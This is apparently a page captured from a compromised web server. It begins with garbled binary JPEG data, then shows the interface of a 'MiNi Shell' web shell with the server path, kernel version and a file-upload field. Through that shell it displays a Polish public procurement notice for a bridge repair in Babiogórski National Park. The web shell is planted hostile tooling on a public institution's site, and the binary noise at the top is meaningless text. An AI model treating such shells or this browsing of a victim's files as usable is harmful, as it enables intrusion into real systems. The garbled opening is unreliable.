JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220926/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220926/0036471801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Infrastruktura drogowa remontu mostu w oddz. 72, O.O. Cyl – oddz. 72a/73c/72d </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">BABIOGÓRSKI PARK NARODOWY Z SIEDZIBĄ W ZAWOI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 122462192</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">1403</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zawoja</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-222</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">507784217</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">park@bgpn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bgpn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Ochrona przyrody </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Infrastruktura drogowa remontu mostu w oddz. 72, O.O. Cyl – oddz. 72a/73c/72d </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a347fdd8-3d77-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00364718</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00017703/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Infrastruktura drogowa remont mostu na Markowej na działce ewidencyjnej nr 24317/4 Zawoja, O.O. Cyl: oddz. 72a/72c/72d.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-a347fdd8-3d77-11ed-8832-4e4740e186ac <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>2. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>3. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>4. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>5. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>6. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: zamowienia@bgpn.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z <br/>dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem <br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z <br/>04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>I. Administrator danych osobowych<br/>Administratorem Pani/Pana danych osobowych jest Babiogórski Parku Narodowego z siedzibą w <br/>Zawoi, 34- 222 Zawoja 1403, NIP: 552-171-36-27, Regon 122462192; <br/>II. Inspektor Ochrony Danych <br/>Administrator wyznaczył Inspektora Ochrony Danych Osobowych w Babiogórskim Parku <br/>Narodowego z siedzibą w Zawoi, kontakt: iodo@bgpn.pl lub pisemnie na adres siedziby <br/>administratora z dopiskiem „Inspektor ODO”; <br/>III. Cele przetwarzania danych i podstawy prawne przetwarzania<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie:<br/>− art. 6 ust. 1 lit. b RODO - przetwarzanie jest niezbędne do wykonania umowy, której stroną <br/>jest osoba, której dane dotyczą lub do podjęcia działań na żądanie osoby, której dane <br/>dotyczą, przed zawarciem umowy z Wykonawcą, którego oferta zostanie wybrana jako <br/>najkorzystniejsza;;<br/>− art. 6 ust. 1 lit. c RODO - przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego <br/>ciążącego na administratorze wynikających z celów związanych z:<br/>− - postępowaniem o udzielenie zamówienia publicznego na przeprowadzenie robót <br/>budowlanych, zgodnie z ustawą z dnia 11 września 2019 r. - Prawo zamówień publicznych, <br/>dalej „ustawa Pzp”; <br/>− prowadzeniem dokumentacji finansowej i księgowej, zgodnie z ustawą z dnia 27 sierpnia <br/>2009 r. o finansach publicznych (t.j. Dz. U. z 2021 r. poz. 305, z póź. zm.), ustawą z dnia 11 <br/>marca 2004 r. o podatku od towarów i usług (t.j. Dz.U. z 2022 r. poz. 931, z póź. zm.) oraz <br/>ustawą z dnia 29 września 1994 r. o rachunkowości (tj. Dz.U. z 2021 r. poz. 217, z póź. zm.);<br/>− wykonaniem prac budowlanych, zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo budowlane <br/>(tj. z Dz.U. z 2021 r. poz. 2351, z póź. zm.);<br/>− przechowywaniem i archiwizowaniem dokumentacji, zgodnie z ustawą z dnia 14 lipca 1983 r. <br/>o narodowym zasobie archiwalnym i archiwach (t.j. Dz. U. z 2020 r. poz. 164.).<br/>− Ewentualnie, na podstawie:<br/>− art. 6 ust. 1 lit. f RODO - przetwarzanie jest niezbędne do celów wynikających z prawnie <br/>uzasadnionych interesów realizowanych przez administratora, ewentualne dochodzenia praw <br/>lub roszczeń związanymi z zawartą umową na podstawie powszechnie obowiązujących <br/>przepisów.<br/>IV. Odbiorcy danych<br/>Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie <br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp oraz osoby, w tym <br/>Inspektor Nadzoru, lub podmioty, którym zostanie przekazana dokumentacja budowlana na <br/>podstawie przepisów ustawy Prawo budowlane. Dane osobowe pozyskane w związku z</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">zawartą umową mogą być przekazane podmiotom przetwarzającym świadczącym dla <br/>administratora usługi teleinformatyczne, finansowo-księgowe, prawe oraz pocztowe. <br/>Dane osobowe pozyskane w związku z umową zawartą z Wykonawcą mogą być powierzone do <br/>dalszego przetwarzania Dyrekcji Generalnej Lasów Państwowych oraz innym jednostkom <br/>Państwowego Gospodarstwa Leśnego Lasy Państwowe (PGL LP), w tym Zakładowi Informatyki <br/>Lasów Państwowych. Dane te będą przekazane w celu weryfikacji i kontroli wykorzystanych <br/>środków pozyskanych z Funduszu Leśnego, w ramach realizacji umowy o dofinansowanie <br/>działań zawartej pomiędzy Babiogórskim Parkiem Narodowym z siedzibą w Zawoi a Dyrekcją <br/>Generalną Lasów Państwowych. Jednostki PGL LP mogą udostępnić dane osobowe do <br/>dalszego przetwarzania: innym podmiotom przetwarzającym na zlecenie i w imieniu PGL LP <br/>świadczącym usługi teleinformatyczne lub księgowe; gdy taki obowiązek wynika z przepisów <br/>prawa; gdy jest to niezbędne dla realizacji potrzeb PGL LP będących konsekwencją zawartego <br/>stosunku pracy lub umów.<br/>V. Okres przechowywania danych <br/>Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 <br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a następnie archiwizowane <br/>przez okres 10 lat; natomiast dane związane z zawarciem i realizacją umowy będą <br/>przechowywane przez okres realizacji umowy, archiwizowane przez okres 10 lat, licząc po <br/>roku zakończenia umowy; zgodnie z Rozporządzeniem Rady Ministrów z dnia 18 stycznia 2011 <br/>r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w <br/>sprawie organizacji i zakresu działania archiwów zakładowych (Dz.U. z 2011 r. Nr 14 poz. 67), <br/>na podstawie art. 6 ust. 2b ustawy o narodowym zasobie archiwalnym i archiwach.<br/>VI. Prawa i obowiązki osób, których dane dotyczą <br/>− Podanie danych związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego <br/>jest wymogiem ustawowym. Konsekwencje niepodania określonych danych wynikają z <br/>ustawy Pzp. Podanie danych niezbędnych do zawarcia umowy i jej realizacji jest dobrowolne, <br/>ale konieczne do jej podpisania. <br/>− Osobie, której dane dotyczą, przysługuje:<br/>− prawo dostępu do swoich danych oraz otrzymania ich kopii (art. 15 RODO),<br/>− prawo do sprostowania swoich danych (art. 16 RODO),<br/>− prawo do usunięcia swoich danych (art. 17 RODO) - jeśli nie zaistniały okoliczności, o <br/>których mowa w art. 17 ust. 3 RODO,<br/>− prawo do żądania od administratora ograniczenia przetwarzania swoich danych (art. 18 <br/>RODO),<br/>− prawo do przenoszenia swoich danych (art. 20 RODO) - jeśli przetwarzanie odbywa się na <br/>podstawie umowy: w celu jej zawarcia lub realizacji (w myśl art. 6 ust. 1 lit. b RODO), oraz w <br/>sposób zautomatyzowany ,<br/>− prawo wniesienia sprzeciwu wobec przetwarzania swoich danych (art. 21 RODO) - jeśli <br/>przetwarzanie odbywa się w celu wykonywania zadania realizowanego w interesie <br/>publicznym lub w ramach sprawowania władzy publicznej, powierzonej administratorowi (tj. <br/>w celu, o którym mowa w art. 6 ust. 1 lit. e RODO),<br/>− prawo wniesienia skargi do organu nadzorczego Prezesa Urzędu Ochrony Danych Osobowych, <br/>ul. Stawki 2, 00-193 Warszawa, (art. 77 RODO) - w przypadku, gdy osoba uzna, iż <br/>przetwarzanie jej danych osobowych narusza przepisy RODO lub inne krajowe przepisy <br/>regulujące kwestię ochrony danych osobowych, obowiązujące w Rzeczpospolitej Polskiej.<br/>2. Zamawiający przypomina o ciążącym na Wykonawcy obowiązku informacyjnym wynikającym <br/>z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu <br/>przez Wykonawcę w związku z udziałem w postępowaniu lub zawarciem i realizacją umowy o zamówienie publiczne (w szczególności pracownikom Wykonawcy lub podwykonawcom), <br/>chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-12/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 260387,47 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1. Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na remoncie <br/>mostu w Zawoi Markowej, na działce ewidencyjnej nr 24317/4, O.O. Cyl.<br/>4.2. Szczegółowy opis przedmiotu zamówienia stanowią: specyfikacja techniczna wykonania i odbioru robót budowlanych, przedmiar oraz projekt wykonawczy, które są załącznikami nr 1a-1c do SWZ.<br/>4.3. Zamówienie nie zostało podzielone na części.<br/>4.4. Miejsce wykonywania przedmiotu zamówienia znajduje się w następującej lokalizacji: Zawoja Markowa – działka ewid. 24317/4, O.O. Cyl: oddz. 72a/72c/72d. – na terenie Babiogórskiego Parku Narodowego.<br/>4.5. Wykonawca zobowiązany jest zrealizować zamówienie zgodnie z zasadami obowiązującymi w <br/>Babiogórskim Parku Narodowym wyszczególnionymi także we „Wzorze umowy” stanowiącym <br/>załącznik nr 4 do SWZ.<br/>4.6. Wszystkie materiały niezbędne do realizacji zadania dostarcza we własnym zakresie Wykonawca.<br/>4.7. Uwaga: W przypadku podania w którymkolwiek z w/w dokumentów nazw producentów lub nazw materiałów konkretnego producenta, wykonawca może zastosować w/w materiały lub materiały równoważne. Przez materiały równoważne Zamawiający rozumie materiały posiadające równorzędne lub wyższe parametry techniczne i jakościowe jak materiały wskazane przez Zamawiającego, przy czym Wykonawca winien wziąć pod uwagę wskazane przez Zamawiającego w dokumentach kryteria oceny równoważności.<br/>4.8. Wykonawca winien wykonać wszelkie zabezpieczenia i oznakowania.<br/>4.9. Wykonawca będzie ponosił pełną odpowiedzialność za wszelkie powstałe szkody do wysokości szkody.<br/>4.10. Wykonawca winien uporządkować miejsca prowadzenia prac każdorazowo po zakończeniu robót budowlanych w danym dniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45221100-3 - Roboty budowlane w zakresie budowy mostów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45236000-0 - Wyrównywanie terenu</p> <p class="mb-0">45122000-8 - Próbne wykopy</p> <p class="mb-0">45113000-2 - Roboty na placu budowy</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">16.1. Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>a) Cena – 60%<br/>W ramach kryterium „Cena” ocenie podlegać będzie cena łączna brutto podana w formularzu oferty. Jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami (art. 225 ust. 1 PZP). Ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>C = Cn/Co x 100 punktów x 60%<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>b) Okres gwarancji jakości (G) – 40 %<br/>W ramach kryterium „Okres gwarancji jakości” ocena ofert zostanie dokonana<br/>przy zastosowanie wzoru:<br/>G=Okres gwarancji badanej oferty, w miesiącach/ okres gwarancji najdłuższy z<br/>ofert, w miesiącach x 100 pkt x 40%<br/>Okres gwarancji nie może być krótszy niż 24 m-cy i dłuższy niż 60 m-cy.<br/>W przypadku gdy Wykonawca w formularzu oferty poda krótszy niż wymagany<br/>okres gwarancji, oferta Wykonawcy zostanie odrzucona na podstawie art. 89<br/>ust. 1 pkt 2 ustawy Pzp.<br/>Jeżeli Wykonawca poda w formularzu oferty okres gwarancji w latach, Zamawiający przeliczy go na miesiące wg zasady 1 rok = 12 miesięcy.<br/>Jeżeli Wykonawca nie poda (nie wpisze) w formularzu oferty okresu gwarancji,<br/>Zamawiający przyjmie do oceny maksymalny 60 miesięczny okres<br/>gwarancji, a w przypadku wyboru oferty Wykonawcy okres ten zostanie<br/>uwzględniony w umowie.<br/>Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 60 - m-cy,<br/>Zamawiający do oceny oferty przyjmie okres 60 m-cy, a w przypadku wyboru<br/>oferty Wykonawcy, do umowy zostanie wpisany okres gwarancji zgodny ze<br/>złożoną ofertą.<br/>16.2. Za najkorzystniejszą zostanie uznana oferta z najwyższą punktacją za kryteria określone w pkt. 16.1. P = C + G – łączna liczba zdobytych punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 19.1.4. zdolności technicznej lub zawodowej. <br/>a) Warunek ten, w zakresie doświadczenia zostanie uznany za spełniony, jeśli <br/>Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu <br/>składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym <br/>okresie) zrealizował lub realizuje (przy czym w tym przypadku będzie liczona <br/>wartość zrealizowanej części przedmiotu umowy) jedno (1) zamówienie <br/>(umowę) na roboty budowlane polegające na budowie lub przebudowie <br/>mostu, gdzie kwota robót powinna mieć wartość nie mniejszą niż: 80 000,00 <br/>zł brutto.<br/>b) Warunek ten, w zakresie osób skierowanych przez wykonawcę do realizacji <br/>zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że <br/>dysponuje lub będzie dysponować: <br/>- Kierownikiem budowy z uprawnieniami budowlanymi do kierowania <br/>budową lub innymi robotami budowlanymi w specjalności mostowej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a. aktualne na dzień składania ofert oświadczenie Wykonawcy stanowiące wstępne <br/>potwierdzenie spełnienia warunków udziału w postępowaniu określonych w SWZ i <br/>braku podstaw do wykluczenia. (załącznik nr 2 do SWZ ZP-12/2022);<br/>b. oświadczenia 